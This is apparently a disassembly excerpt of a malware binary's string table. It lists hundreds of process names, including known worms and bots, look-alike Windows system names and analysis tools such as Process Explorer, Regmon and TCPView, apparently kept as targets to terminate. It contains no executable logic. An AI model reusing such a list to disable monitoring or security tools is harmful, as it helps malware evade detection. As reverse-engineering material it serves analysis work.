aTaskhider_exe db 'TASKHIDER.EXE',0 ; DATA XREF: .text:0044858C�o
align 4
aMswin32 db 'MSWIN32',0 ; DATA XREF: .text:00448584�o
aFoods_exe db 'FOODS.EXE',0 ; DATA XREF: .text:00448580�o
align 10h
aPostcard_exe db 'POSTCARD.EXE',0 ; DATA XREF: .text:0044857C�o
align 10h
aMsdev32_exe db 'MSDEV32.EXE',0 ; DATA XREF: .text:00448578�o
aRun0nce_exe db 'RUN0NCE.EXE',0 ; DATA XREF: .text:00448574�o
aSpools32_exe db 'SPOOLS32.EXE',0 ; DATA XREF: .text:00448570�o
align 4
aSpool32_exe db 'SPOOL32.EXE',0 ; DATA XREF: .text:0044856C�o
aCrss32_exe db 'CRSS32.EXE',0 ; DATA XREF: .text:00448568�o
align 10h
aIexploree_exe db 'IEXPLOREE.EXE',0 ; DATA XREF: .text:00448564�o
align 10h
aQq_exe db 'QQ.EXE',0 ; DATA XREF: .text:00448560�o
align 4
aWindows_update db 'WINDOWS_UPDATER01.EXE',0 ; DATA XREF: .text:0044855C�o
align 10h
aAddiq32_exe db 'ADDIQ32.EXE',0 ; DATA XREF: .text:00448554�o
aSysinfo_exe db 'SYSINFO.EXE',0 ; DATA XREF: .text:00448550�o
aWuamkoppnp_exe db 'WUAMKOPPNP.EXE',0 ; DATA XREF: .text:00448548�o
align 4
aScrh0st_exe db 'SCRH0ST.EXE',0 ; DATA XREF: .text:00448544�o
aSvch0st32_exe db 'SVCH0ST32.EXE',0 ; DATA XREF: .text:00448540�o
align 4
aSvhosts_exe db 'SVHOSTS.EXE',0 ; DATA XREF: .text:0044853C�o
aSvhost_exe db 'SVHOST.EXE',0 ; DATA XREF: .text:00448538�o
align 4
aIexpl0re_exe db 'IEXPL0RE.EXE',0 ; DATA XREF: .text:00448530�o
align 4
aSvc_exe db 'SVC.EXE',0 ; DATA XREF: .text:0044852C�o
; .text:004488D8�o
aZf_exe db 'ZF.EXE',0 ; DATA XREF: .text:00448524�o
align 4
aZfr_exe db 'ZFR.EXE',0 ; DATA XREF: .text:00448520�o
aWins32_exe db 'WINS32.EXE',0 ; DATA XREF: .text:0044851C�o
align 10h
aWuamgre_exe db 'WUAMGRE.EXE',0 ; DATA XREF: .text:00448518�o
aScrhost32_exe db 'SCRHOST32.EXE',0 ; DATA XREF: .text:00448510�o
align 4
aSassere_exe db 'SASSERE.EXE',0 ; DATA XREF: .text:0044850C�o
aSasser_exe db 'SASSER.EXE',0 ; DATA XREF: .text:00448508�o
align 4
aBlast_exe db 'BLAST.EXE',0 ; DATA XREF: .text:00448504�o
align 10h
aMsblast_exe db 'MSBLAST.EXE',0 ; DATA XREF: .text:00448500�o
aHiderun_exe db 'HIDERUN.EXE',0 ; DATA XREF: .text:004484F0�o
aTcpshell_exe db 'TCPSHELL.EXE',0 ; DATA XREF: .text:004484E8�o
align 4
aXssh_exe db 'XSSH.EXE',0 ; DATA XREF: .text:004484E4�o
align 4
aIcmd_exe db 'ICMD.EXE',0 ; DATA XREF: .text:004484E0�o
; .text:00448648�o
align 10h
aFtpit_exe db 'FTPIT.EXE',0 ; DATA XREF: .text:004484DC�o
align 4
aNaab_exe db 'NAAB.EXE',0 ; DATA XREF: .text:004484D8�o
align 4
aPusu_exe db 'PUSU.EXE',0 ; DATA XREF: .text:004484D4�o
align 4
aTbar_exe db 'TBAR.EXE',0 ; DATA XREF: .text:004484D0�o
align 10h
aArabian_exe db 'ARABIAN.EXE',0 ; DATA XREF: .text:004484CC�o
aArabz_exe db 'ARABZ.EXE',0 ; DATA XREF: .text:004484C8�o
align 4
aDgjdjg_exe db 'DGJDJG.EXE',0 ; DATA XREF: .text:004484C4�o
align 4
aOooo_exe db 'OOOO.EXE',0 ; DATA XREF: .text:004484C0�o
align 10h
aOoooo_exe db 'OOOOO.EXE',0 ; DATA XREF: .text:004484BC�o
align 4
aOp_exe db 'OP.EXE',0 ; DATA XREF: .text:004484B8�o
align 4
a2pac_exe db '2PAC.EXE',0 ; DATA XREF: .text:004484B4�o
align 10h
aLogix_exe db 'LOGIX.EXE',0 ; DATA XREF: .text:004484B0�o
align 4
aCash7oc_jpg db 'CASH7OC.JPG',0 ; DATA XREF: .text:004484AC�o
a0cash_exe db '0CASH.EXE',0 ; DATA XREF: .text:004484A8�o
align 4
aCash_exe db 'CASH.EXE',0 ; DATA XREF: .text:004484A4�o
align 10h
aAoautoupdatena db 'AOAUTOUPDATENAV.EXE',0 ; DATA XREF: .text:004484A0�o
aXdcc_install_e db 'XDCC_INSTALL.EXEDD.EXE',0 ; DATA XREF: .text:0044849C�o
align 4
aNetworkactivpi db 'NETWORKACTIVPIAFCTMV1.5.EXE',0 ; DATA XREF: .text:00448498�o
aPexplorer_exe db 'PEXPLORER.EXE',0 ; DATA XREF: .text:00448494�o
align 4
aProcdump32_exe db 'PROCDUMP32.EXE',0 ; DATA XREF: .text:00448490�o
align 4
aProcdump_exe db 'PROCDUMP.EXE',0 ; DATA XREF: .text:0044848C�o
align 4
aTlist_exe db 'TLIST.EXE',0 ; DATA XREF: .text:00448488�o
align 4
aFport_exe db 'FPORT.EXE',0 ; DATA XREF: .text:00448484�o
align 10h
aFilemon_exe db 'FILEMON.EXE',0 ; DATA XREF: .text:00448480�o
aPortmon_exe db 'PORTMON.EXE',0 ; DATA XREF: .text:0044847C�o
aProcexp_exe db 'PROCEXP.EXE',0 ; DATA XREF: .text:00448478�o
aRegmon_exe db 'REGMON.EXE',0 ; DATA XREF: .text:00448474�o
align 10h
aWinsniff_exe db 'WINSNIFF.EXE',0 ; DATA XREF: .text:00448470�o
align 10h
aHostmon_exe db 'HOSTMON.EXE',0 ; DATA XREF: .text:0044846C�o
aSharemon_exe db 'SHAREMON.EXE',0 ; DATA XREF: .text:00448468�o
align 4
aTcpstats_exe db 'TCPSTATS.EXE',0 ; DATA XREF: .text:00448464�o
align 4
aTcpstat_exe db 'TCPSTAT.EXE',0 ; DATA XREF: .text:00448460�o
aTcpmon_exe db 'TCPMON.EXE',0 ; DATA XREF: .text:0044845C�o
align 4
aTcpdump_exe db 'TCPDUMP.EXE',0 ; DATA XREF: .text:00448458�o
aTcpviewpro_exe db 'TCPVIEWPRO.EXE',0 ; DATA XREF: .text:00448454�o
align 10h
aTcpview_exe db 'TCPVIEW.EXE',0 ; DATA XREF: .text:00448450�o
aZz_exe db 'ZZ.EXE',0 ; DATA XREF: .text:0044844C�o
align 4
aDbot_exe db 'DBOT.EXE',0 ; DATA XREF: .text:00448448�o
align 10h
aHbot_exe db 'HBOT.EXE',0 ; DATA XREF: .text:00448444�o
align 4
aA_bat db 'A.BAT',0 ; DATA XREF: .text:00448440�o
align 4
aAg_exe db 'AG.EXE',0 ; DATA XREF: .text:0044843C�o
; .text:0044870C�o
align 4
aRundil_exe db 'RUNDIL.EXE',0 ; DATA XREF: .text:00448434�o
align 4
aWinpooch_exe db 'WINPOOCH.EXE',0 ; DATA XREF: .text:00448430�o
align 4
aWinmpat_exe db 'WINMPAT.EXE',0 ; DATA XREF: .text:00448428�o
aMsssmsngr6417_ db 'MSSSMSNGR6417.EXE',0 ; DATA XREF: .text:00448424�o
align 4
aWaucult_exe db 'WAUCULT.EXE',0 ; DATA XREF: .text:00448420�o
aJswtss_exe db 'JSWTSS.EXE',0 ; DATA XREF: .text:0044841C�o
align 10h
aSvcvhost_exe db 'SVCVHOST.EXE',0 ; DATA XREF: .text:00448418�o
align 10h
aRp5_exe db 'RP5.EXE',0 ; DATA XREF: .text:00448414�o
aBsdmpldrvr642_ db 'BSDMPLDRVR642.EXE',0 ; DATA XREF: .text:00448410�o
align 4
aMyhost_exe db 'MYHOST.EXE',0 ; DATA XREF: .text:0044840C�o
align 4
aMswins_exe db 'MSWINS.EXE',0 ; DATA XREF: .text:00448408�o
align 4
aWindowsvista_e db 'WINDOWSVISTA.EXE',0 ; DATA XREF: .text:00448404�o
align 4
aQkkku_exe db 'QKKKU.EXE',0 ; DATA XREF: .text:00448400�o
align 4
aMessengerr_exe db 'MESSENGERR.EXE',0 ; DATA XREF: .text:004483FC�o
align 4
aEraseme_exe db 'ERASEME.EXE',0 ; DATA XREF: .text:004483F8�o
aTskmagr_exe db 'TSKMAGR.EXE',0 ; DATA XREF: .text:004483F4�o
aCmh_exe db 'CMH.EXE',0 ; DATA XREF: .text:004483F0�o
aSmsc_exe db 'SMSC.EXE',0 ; DATA XREF: .text:004483EC�o
align 10h
aQtask_exe db 'QTASK.EXE',0 ; DATA XREF: .text:004483E8�o
align 4
aWuaumqr1_exe db 'WUAUMQR1.EXE',0 ; DATA XREF: .text:004483E4�o
align 4
aWinlogin_exe db 'WINLOGIN.EXE',0 ; DATA XREF: .text:004483E0�o
align 4
aInternet_exe db 'INTERNET.EXE',0 ; DATA XREF: .text:004483DC�o
align 4
aCtfmom_exe db 'CTFMOM.EXE',0 ; DATA XREF: .text:004483D4�o
align 4
aWindowantasdiv db 'WINDOWANTASDIVRI.EXE',0 ; DATA XREF: .text:004483D0�o
align 10h
aSchost_exe db 'SCHOST.EXE',0 ; DATA XREF: .text:004483CC�o
align 4
aNewbot_exe db 'NEWBOT.EXE',0 ; DATA XREF: .text:004483C8�o
align 4
aIi_exe db 'II.EXE',0 ; DATA XREF: .text:004483C4�o
align 10h
aMssdev_exe db 'MSSDEV.EXE',0 ; DATA XREF: .text:004483C0�o
align 4
aIshost_exe db 'ISHOST.EXE',0 ; DATA XREF: .text:004483BC�o
align 4
aIsmini_exe db 'ISMINI.EXE',0 ; DATA XREF: .text:004483B8�o
align 4
aNl210_bat db 'NL210.BAT',0 ; DATA XREF: .text:004483B0�o
align 10h
aWinupdtsrv_exe db 'WINUPDTSRV.EXE',0 ; DATA XREF: .text:004483AC�o
align 10h
aMsn_update_exe db 'MSN_UPDATE.EXE',0 ; DATA XREF: .text:004483A8�o
align 10h
aSysmonxp_exe db 'SYSMONXP.EXE',0 ; DATA XREF: .text:004483A0�o
align 10h
aSvcdata_exe db 'SVCDATA.EXE',0 ; DATA XREF: .text:0044839C�o
aReg32_exe db 'REG32.EXE',0 ; DATA XREF: .text:00448398�o
align 4
aDll32_exe db 'DLL32.EXE',0 ; DATA XREF: .text:00448394�o
align 4
aIexplores_exe db 'IEXPLORES.EXE',0 ; DATA XREF: .text:00448390�o
align 4
aSusp_exe db 'SUSP.EXE',0 ; DATA XREF: .text:0044838C�o
align 10h
aSpool_exe db 'SPOOL.EXE',0 ; DATA XREF: .text:00448388�o
align 4
a568_exe db '568.EXE',0 ; DATA XREF: .text:00448384�o
aCcupdate_exe db 'CCUPDATE.EXE',0 ; DATA XREF: .text:00448380�o
align 4
aLoadadv642_exe db 'LOADADV642.EXE',0 ; DATA XREF: .text:0044837C�o
align 4
aSsc_exe db 'SSC.EXE',0 ; DATA XREF: .text:00448378�o
aVcmon_exe db 'VCMON.EXE',0 ; DATA XREF: .text:00448374�o
align 4
aMstskmgr_exe db 'MSTSKMGR.EXE',0 ; DATA XREF: .text:00448370�o
align 4
aServlces_exe db 'SERVLCES.EXE',0 ; DATA XREF: .text:0044836C�o
align 4
aServlce_exe db 'SERVLCE.EXE',0 ; DATA XREF: .text:00448368�o
aMslaugh_exe db 'MSLAUGH.EXE',0 ; DATA XREF: .text:00448364�o
aMsnmgr12_exe db 'MSNMGR12.EXE',0 ; DATA XREF: .text:00448360�o
align 10h
aWinform32_exe db 'WINFORM32.EXE',0
align 10h
aDllx32_exe db 'DLLX32.EXE',0
align 4
aRp_exe db 'RP.EXE',0
align 4
aGecko_exe db 'GECKO.EXE',0
align 10h
aReptile_exe db 'REPTILE.EXE',0
aLrsys_exe db 'LRSYS.EXE',0
align 4
aSrshost_exe db 'SRSHOST.EXE',0
aMsdos_exe db 'MSDOS.EXE',0
align 10h
aWumgre_exe db 'WUMGRE.EXE',0
align 4
aWumgr_exe db 'WUMGR.EXE',0
align 4
aD3dupdate_exe db 'D3DUPDATE.EXE',0
align 4
aI11r54n4_exe db 'I11R54N4.EXE',0
align 4
aBbeagle32_exe db 'BBEAGLE32.EXE',0
align 4
aBbeagle2_exe db 'BBEAGLE2.EXE',0
align 4
aBbeagle_exe db 'BBEAGLE.EXE',0
aBeagle_exe db 'BEAGLE.EXE',0
align 10h
aSsate_exe db 'SSATE.EXE',0
align 4
aVhost_exe db 'VHOST.EXE',0
align 4
aIeserver_exe db 'IESERVER.EXE',0
align 4
aDsrss_exe db 'DSRSS.EXE',0
align 4
aSvvosts_exe db 'SVVOSTS.EXE',0
aUpdat_exe db 'UPDAT.EXE',0
align 4
aServicesmsi_ex db 'SERVICESMSI.EXE',0
aSpoolmgr_exe db 'SPOOLMGR.EXE',0
align 4
aWinhelp_exe_0 db 'WINHELP.EXE',0 ; DATA XREF: .text:00448750�o
aNttdll_exe db 'NTTDLL.EXE',0
align 4
aIrun4_exe db 'IRUN4.EXE',0
align 10h
aSys_xp_exe db 'SYS_XP.EXE',0
align 4
aSvcost_exe db 'SVCOST.EXE',0 ; DATA XREF: .text:00448534�o
align 4
aWinusb32_exe db 'WINUSB32.EXE',0
align 4
aWinusb_exe db 'WINUSB.EXE',0
align 4
aWinspooler_exe db 'WINSPOOLER.EXE',0
align 4
aWinsock_exe db 'WINSOCK.EXE',0
aIpcmgr_exe db 'IPCMGR.EXE',0
align 4
aWuamgrd3_exe db 'WUAMGRD3.EXE',0
align 4
aWuamgrd_exe db 'WUAMGRD.EXE',0 ; DATA XREF: .text:00448514�o
aWuamgr_exe db 'WUAMGR.EXE',0 ; DATA XREF: .text:004482C8�o
align 4
aLansas_exe db 'LANSAS.EXE',0 ; DATA XREF: .text:004482C4�o
align 10h
aXml32_exe db 'XML32.EXE',0 ; DATA XREF: .text:004482C0�o
align 4
aXml_exe db 'XML.EXE',0 ; DATA XREF: .text:004482BC�o
aWinz_exe db 'WINZ.EXE',0 ; DATA XREF: .text:004482B8�o
align 10h
aWinsys_exe db 'WINSYS.EXE',0 ; DATA XREF: .text:004482B4�o
align 4
aWgavm_exe db 'WGAVM.EXE',0
align 4
aStdrun3_exe db 'STDRUN3.EXE',0
aTaskdir_exe db 'TASKDIR.EXE',0
aPmsngr_exe db 'PMSNGR.EXE',0
align 4
aTaskmsg_exe db 'TASKMSG.EXE',0
aWdfmgr32_exe db 'WDFMGR32.EXE',0
align 4
aNotaped_exe db 'NOTAPED.EXE',0
aCsrs_exe db 'CSRS.EXE',0
align 10h
aWincomm_exe db 'WINCOMM.EXE',0
aWinocx_exe db 'WINOCX.EXE',0
align 4
aWinlolx_exe db 'WINLOLX.EXE',0
aJavanet_exe db 'JAVANET.EXE',0
aMaxd641_exe db 'MAXD641.EXE',0
aMs_exe db 'MS.EXE',0
align 4
aService_exe db 'SERVICE.EXE',0
aMsnlive_exe db 'MSNLIVE.EXE',0
aWip_exe db 'WIP.EXE',0
a666_exe db '666.EXE',0
aMybot_exe db 'MYBOT.EXE',0
align 4
aMyt0b_exe db 'MYT0B.EXE',0
align 4
aHellmsn_exe db 'HELLMSN.EXE',0
aFunny_pic_scr db 'FUNNY_PIC.SCR',0
align 10h
aMsgm_exe db 'MSGM.EXE',0
align 4
aMsgmr_exe db 'MSGMR.EXE',0
align 4
aWinpadg_exe db 'WINPADG.EXE',0
aHide_exe db 'HIDE.EXE',0 ; DATA XREF: .text:004484FC�o
; .text:00448588�o
align 10h
aHidden_exe db 'HIDDEN.EXE',0 ; DATA XREF: .text:004484F8�o
align 4
aHidden32_exe db 'HIDDEN32.EXE',0 ; DATA XREF: .text:004484EC�o
; .text:004484F4�o
align 4
aHiddenrun_exe db 'HIDDENRUN.EXE',0
align 4
aWindowsp_exe db 'WINDOWSP.EXE',0
align 4
aWinsystem_exe db 'WINSYSTEM.EXE',0
align 4
aSystem32_exe db 'SYSTEM32.EXE',0 ; DATA XREF: .text:004488EC�o
align 4
aSystem_exe db 'SYSTEM.EXE',0 ; DATA XREF: .text:004488E8�o
align 4
aWindow_exe db 'WINDOW.EXE',0
align 4
aWindows_exe db 'WINDOWS.EXE',0
aSaveuninst_exe db 'SAVEUNINST.EXE',0
align 10h
aWups_exe db 'WUPS.EXE',0
align 4
aSvcshoter_exe db 'SVCSHOTER.EXE',0
align 4
aWinmap_exe db 'WINMAP.EXE',0
align 4
aMydocs_exe db 'MYDOCS.EXE',0
align 4
aWinb_exe db 'WINB.EXE',0
align 10h
aWinnamps_exe db 'WINNAMPS.EXE',0
align 10h
aCmrss_dll_exe db 'CMRSS.DLL.EXE',0
align 10h
aWin_exe db 'WIN.EXE',0
aWin32_exe db 'WIN32.EXE',0
align 4
aWinis_exe db 'WINIS.EXE',0
align 10h
aMsnmsg_exe db 'MSNMSG.EXE',0
align 4
aMsnmsgs_exe db 'MSNMSGS.EXE',0
aXpfirewall_exe db 'XPFIREWALL.EXE',0
align 4
aWfdmgr_exe db 'WFDMGR.EXE',0
align 4
aTaskm0n_exe db 'TASKM0N.EXE',0
aTaskgmr_exe db 'TASKGMR.EXE',0
aWincfg32_exe db 'WINCFG32.EXE',0
align 4
aSyscfg32_exe db 'SYSCFG32.EXE',0
align 4
aSyscfg16_exe db 'SYSCFG16.EXE',0
align 4
aSystra_exe db 'SYSTRA.EXE',0
align 4
aRpc32_exe db 'RPC32.EXE',0
align 4
aMsmgrxp_exe db 'MSMGRXP.EXE',0
aSuhoy_exe db 'SUHOY.EXE',0
align 4
aPicx_exe db 'PICX.EXE',0
align 4
aMathchk_exe db 'MATHCHK.EXE',0
aRundll16_exe db 'RUNDLL16.EXE',0
align 4
aMsserrv32_exe db 'MSSERRV32.EXE',0
align 4
aPopwin_exe db 'POPWIN.EXE',0
align 10h
aRundii32_exe db 'RUNDII32.EXE',0
align 10h
aCtxad_exe db 'CTXAD.EXE',0
align 4
aMshtml3_exe db 'MSHTML3.EXE',0
aMshtml2_exe db 'MSHTML2.EXE',0
aMshtml1_exe db 'MSHTML1.EXE',0
aMshtml_exe db 'MSHTML.EXE',0
align 4
aNdrv_exe db 'NDRV.EXE',0
align 4
aTskmgr_exe db 'TSKMGR.EXE',0
align 4
aPapersrv_exe db 'PAPERSRV.EXE',0
align 4
aIe7_exe db 'IE7.EXE',0
aIe6_exe db 'IE6.EXE',0
aTaskmngr32_exe db 'TASKMNGR32.EXE',0 ; DATA XREF: .text:0044816C�o
align 4
aW32gen_exe db 'W32GEN.EXE',0 ; DATA XREF: .text:00448168�o
align 10h
aRundll_exe db 'RUNDLL.EXE',0 ; DATA XREF: .text:00448164�o
; .text:00448438�o
align 4
aBot_exe db 'BOT.EXE',0 ; DATA XREF: .text:00448160�o
aCrxbot_exe db 'CRXBOT.EXE',0 ; DATA XREF: .text:0044815C�o
align 10h
aDns32_exerxbot db 'DNS32.EXERXBOT.EXE',0 ; DATA XREF: .text:00448158�o
align 4
aDnssvc_exe db 'DNSSVC.EXE',0 ; DATA XREF: .text:00448154�o
align 10h
aDnssrv_exe db 'DNSSRV.EXE',0 ; DATA XREF: .text:00448150�o
align 4
aWin32update_ex db 'WIN32UPDATE.EXE',0 ; DATA XREF: .text:0044814C�o
aWinsvc_exe db 'WINSVC.EXE',0 ; DATA XREF: .text:00448148�o
align 4
aScsrc_exe db 'SCSRC.EXE',0 ; DATA XREF: .text:00448144�o
align 4
aWservices_exe db 'WSERVICES.EXE',0 ; DATA XREF: .text:00448140�o
align 4
aWservice_exe db 'WSERVICE.EXE',0 ; DATA XREF: .text:0044813C�o
align 4
aWinime_exe db 'WINIME.EXE',0 ; DATA XREF: .text:00448138�o
align 10h
aLinewsrv_exe db 'LINEWSRV.EXE',0 ; DATA XREF: .text:00448134�o
align 10h
aMicrosoft_exe db 'MICROSOFT.EXE',0 ; DATA XREF: .text:00448130�o
align 10h
aServices32_exe db 'SERVICES32.EXE',0 ; DATA XREF: .text:0044812C�o
align 10h
aWgareg_exe db 'WGAREG.EXE',0 ; DATA XREF: .text:00448128�o
align 4
aAsn1sys_exe db 'ASN1SYS.EXE',0 ; DATA XREF: .text:00448124�o
aIiexplorer_exe db 'IIEXPLORER.EXE',0 ; DATA XREF: .text:00448120�o
align 4
aIiexplore_exe db 'IIEXPLORE.EXE',0 ; DATA XREF: .text:0044811C�o
align 4
aLsass_32_exe db 'LSASS_32.EXE',0 ; DATA XREF: .text:00448118�o
align 4
aSssvhost_exe db 'SSSVHOST.EXE',0 ; DATA XREF: .text:00448114�o
align 4
aKernel32_exe db 'KERNEL32.EXE',0 ; DATA XREF: .text:00448110�o
align 4
aSpoolvs_exe db 'SPOOLVS.EXE',0 ; DATA XREF: .text:0044810C�o
aSpoolv_exe db 'SPOOLV.EXE',0 ; DATA XREF: .text:00448108�o
align 10h
aMsnmsgrr_exe db 'MSNMSGRR.EXE',0 ; DATA XREF: .text:00448104�o
align 10h
aMsmmsgr_exe db 'MSMMSGR.EXE',0 ; DATA XREF: .text:00448100�o
aMsner_exe db 'MSNER.EXE',0 ; DATA XREF: .text:004480FC�o
align 4
aMsnupdater_exe db 'MSNUPDATER.EXE',0 ; DATA XREF: .text:004480F8�o
align 4
aMsnupdate_exe db 'MSNUPDATE.EXE',0 ; DATA XREF: .text:004480F4�o
align 4
aAlg32_exe db 'ALG32.EXE',0 ; DATA XREF: .text:004480F0�o
align 4
aInstall_sp_exe db 'INSTALL_SP.EXE',0 ; DATA XREF: .text:004480EC�o
align 4
aTmrservice_exe db 'TMRSERVICE.EXE',0 ; DATA XREF: .text:004480E8�o
align 4
aMsnplus_exe db 'MSNPLUS.EXE',0 ; DATA XREF: .text:004480E4�o
aMsmpls_exe db 'MSMPLS.EXE',0 ; DATA XREF: .text:004480E0�o
align 4
aYesbron_com db 'YESBRON.COM',0 ; DATA XREF: .text:004480DC�o
aWinlogon32_exe db 'WINLOGON32.EXE',0 ; DATA XREF: .text:004480D8�o
align 4
aWinl0gin_exe db 'WINL0GIN.EXE',0 ; DATA XREF: .text:004480D4�o
align 4
aWinl0gon_exe db 'WINL0GON.EXE',0 ; DATA XREF: .text:004480D0�o
align 4
aAk_exe db 'AK.EXE',0 ; DATA XREF: .text:004480CC�o
align 10h
aAkwid_exe db 'AKWID.EXE',0 ; DATA XREF: .text:004480C8�o
align 4
aSyser_exe db 'SYSER.EXE',0 ; DATA XREF: .text:004480C4�o
align 4
aWinupd_exe db 'WINUPD.EXE',0 ; DATA XREF: .text:004480C0�o
; .text:004483A4�o
align 4
aSys_exe db 'SYS.EXE',0 ; DATA XREF: .text:004480BC�o
aWinrpc_exe db 'WINRPC.EXE',0 ; DATA XREF: .text:004480B8�o
align 4
aLsass32_exe db 'LSASS32.EXE',0 ; DATA XREF: .text:004480B4�o
aMsdevelop_exe db 'MSDEVELOP.EXE',0 ; DATA XREF: .text:004480B0�o
align 4
aNetmsn_exe db 'NETMSN.EXE',0 ; DATA XREF: .text:004480AC�o
align 10h
aWinsockx32_exe db 'WINSOCKX32.EXE',0 ; DATA XREF: .text:004480A8�o
align 10h
aSserrvv_exe db 'SSERRVV.EXE',0 ; DATA XREF: .text:004480A4�o
aWinsys_32_exe db 'WINSYS_32.EXE',0 ; DATA XREF: .text:004480A0�o
align 4
aSerrv_exe db 'SERRV.EXE',0 ; DATA XREF: .text:0044809C�o
align 4
aMysvcc_exe db 'MYSVCC.EXE',0 ; DATA XREF: .text:00448098�o
align 4
aSpoolss_exe db 'SPOOLSS.EXE',0 ; DATA XREF: .text:00448094�o
; .text:0044854C�o
aNtsf_exe db 'NTSF.EXE',0 ; DATA XREF: .text:00448090�o
; .text:00448558�o
align 4
aWks_exe db 'WKS.EXE',0 ; DATA XREF: .text:00448088�o
aBingo_exe db 'BINGO.EXE',0 ; DATA XREF: .text:00448084�o
align 10h
aBingoo_exe db 'BINGOO.EXE',0 ; DATA XREF: .text:00448080�o
align 4
aScrhost_exe db 'SCRHOST.EXE',0 ; DATA XREF: .text:0044807C�o
aSvlhost_exe db 'SVLHOST.EXE',0
aWinsini_exe db 'WINSINI.EXE',0
aAaaamon_exe db 'AAAAMON.EXE',0
aDpnwsock_exe db 'DPNWSOCK.EXE',0
align 4
aLmhsvc_exe db 'LMHSVC.EXE',0
align 4
aS32evnt1_exe db 'S32EVNT1.EXE',0
align 4
aDmloader_exe db 'DMLOADER.EXE',0
align 4
aDskquota_exe db 'DSKQUOTA.EXE',0
align 4
aCatsrv_exe db 'CATSRV.EXE',0
align 4
aRasapi32_exe db 'RASAPI32.EXE',0
align 4
aWintemp_exe db 'WINTEMP.EXE',0
aDrives_exe db 'DRIVES.EXE',0
align 4
aIrdvxc_exe db 'IRDVXC.EXE',0
align 4
aCashback_exe db 'CASHBACK.EXE',0
align 4
aMsusb_exe db 'MSUSB.EXE',0
align 4
aMsupsrv_exe db 'MSUPSRV.EXE',0
aMsjava_exe db 'MSJAVA.EXE',0 ; DATA XREF: .text:00448038�o
align 4
aMsJava_exe db 'MS-JAVA.EXE',0 ; DATA XREF: .text:00448034�o
aWininet_exe db 'WININET.EXE',0
aWiniogin_exe db 'WINIOGIN.EXE',0
align 4
aMsxml_exe db 'MSXML.EXE',0
align 10h
aNetapi1_exe db 'NETAPI[1].EXE',0
align 10h
aNetapi32_exe db 'NETAPI32.EXE',0
align 10h
aNetapi_exe db 'NETAPI.EXE',0
align 4
aWinrnr_exe db 'WINRNR.EXE',0
align 4
aWallpap1_exe db 'WALLPAP[1].EXE',0
align 4
aWallpap_exe db 'WALLPAP.EXE',0
aWinsysmngr32_e db 'WINSYSMNGR32.EXE',0
align 4
aWinload_exe db 'WINLOAD.EXE',0
aWincmd_exe db 'WINCMD.EXE',0
align 10h
aNetlogon_exe db 'NETLOGON.EXE',0
align 10h
aExplorer32_exe db 'EXPLORER32.EXE',0
align 10h
aDihf_exe db 'DIHF.EXE',0
align 4
aWintask32_exe db 'WINTASK32.EXE',0
align 4
aWincodecs_exe db 'WINCODECS.EXE',0
align 4
aSxserv101_exe db 'SXSERV101.EXE',0 ; DATA XREF: .text:00447FEC�o
align 4
aMssecure32_exe db 'MSSECURE32.EXE',0
align 4
aMsexplore_exe db 'MSEXPLORE.EXE',0
align 4
aDllsys64_exe db 'DLLSYS64.EXE',0
align 4
aSvchozt_exe db 'SVCHOZT.EXE',0
aLibsys32_exe db 'LIBSYS32.EXE',0
align 4
aDllmgr64_exe db 'DLLMGR64.EXE',0
align 4
aCrsscs_exe db 'CRSSCS.EXE',0
align 4
aCrsss_exe db 'CRSSS.EXE',0
align 10h
aSmsss_exe db 'SMSSS.EXE',0
align 4
aLsasss_exe db 'LSASSS.EXE',0
align 4
aRofl_exe db 'ROFL.EXE',0
align 4
aLol_exe db 'LOL.EXE',0
aRotflz_exe db 'ROTFLZ.EXE',0
align 4
aSvwhost32_exe db 'SVWHOST32.EXE',0
align 4
aIelower2_exe db 'IELOWER2.EXE',0
align 4
aIelower_exe db 'IELOWER.EXE',0
aLower_exe db 'LOWER.EXE',0
align 10h
aBl0w_exe db 'BL0W.EXE',0
align 4
aSvch0st_exe db 'SVCH0ST.EXE',0
aWinupdates_exe db 'WINUPDATES.EXE',0
align 4
aWkssr_exe db 'WKSSR.EXE',0
align 4
aPerfont_exe db 'PERFONT.EXE',0
aQttask_bat db 'QTTASK.BAT',0
align 4
aMsupdate_exe db 'MSUPDATE.EXE',0
align 4
aMsnxplive_exe db 'MSNXPLIVE.EXE',0
align 4
aSalvage_exe db 'SALVAGE.EXE',0
aFhm_exe db 'FHM.EXE',0
aMscrash_exe db 'MSCRASH.EXE',0
aRecsl_exe db 'RECSL.EXE',0 ; DATA XREF: .text:004483D8�o
align 4
aBrwconf_exe db 'BRWCONF.EXE',0
aMsserv32_exe db 'MSSERV32.EXE',0
align 4
aM2_2_exe db 'M2.2.EXE',0
align 10h
aWindir32_exe db 'WINDIR32.EXE',0
align 10h
aZango_exe db 'ZANGO.EXE',0
align 4
aRunjava_exe db 'RUNJAVA.EXE',0
aServicent_exe db 'SERVICENT.EXE',0
align 4
aCsvhost_exe db 'CSVHOST.EXE',0
aMs32_exe db 'MS32.EXE',0
align 10h
aW32_exe db 'W32.EXE',0
aZ_exe db 'Z.EXE',0
align 10h
aDll64_exe db 'DLL64.EXE',0 ; DATA XREF: .text:00447F48�o
align 4
aServ454_exe db 'SERV454.EXE',0 ; DATA XREF: .text:00447F44�o
aMsie701_exe db 'MSIE701.EXE',0 ; DATA XREF: .text:00447F40�o
aWinrarx_exe db 'WINRARX.EXE',0 ; DATA XREF: .text:00447F3C�o
aUpdate32_exe db 'UPDATE32.EXE',0 ; DATA XREF: .text:00447F38�o
align 10h
aGreen_exe db 'GREEN.EXE',0 ; DATA XREF: .text:00447F34�o
align 4
aBling_exe db 'BLING.EXE',0 ; DATA XREF: .text:00447F30�o
align 4
aCrssr_exe db 'CRSSR.EXE',0 ; DATA XREF: .text:00447F2C�o
align 4
aWnl_exe db 'WNL.EXE',0 ; DATA XREF: .text:00447F28�o
aOwinssap_exe db 'OWINSSAP.EXE',0 ; DATA XREF: .text:00447F24�o
align 4
aSvchost32_exe db 'SVCHOST32.EXE',0 ; DATA XREF: .text:00447F20�o
; .text:00448528�o
align 4
aSvchosts_exe db 'SVCHOSTS.EXE',0 ; DATA XREF: .text:00447F1C�o
; .text:004488E0�o
align 4
aRbot_exe db 'RBOT.EXE',0 ; DATA XREF: .text:00447F18�o
align 4
aSvhost32_exe db 'SVHOST32.EXE',0 ; DATA XREF: .text:00447F14�o
align 4
aSvhostcs32_exe db 'SVHOSTCS32.EXE',0 ; DATA XREF: .text:00447F10�o
; .text:0044808C�o ...
align 4
aSms_exe db 'SMS.EXE',0 ; DATA XREF: .text:00447F0C�o
aSeekmo_exe db 'SEEKMO.EXE',0 ; DATA XREF: .text:00447F08�o
align 4
aSass_exe db 'SASS.EXE',0 ; DATA XREF: .text:00447F04�o
align 4
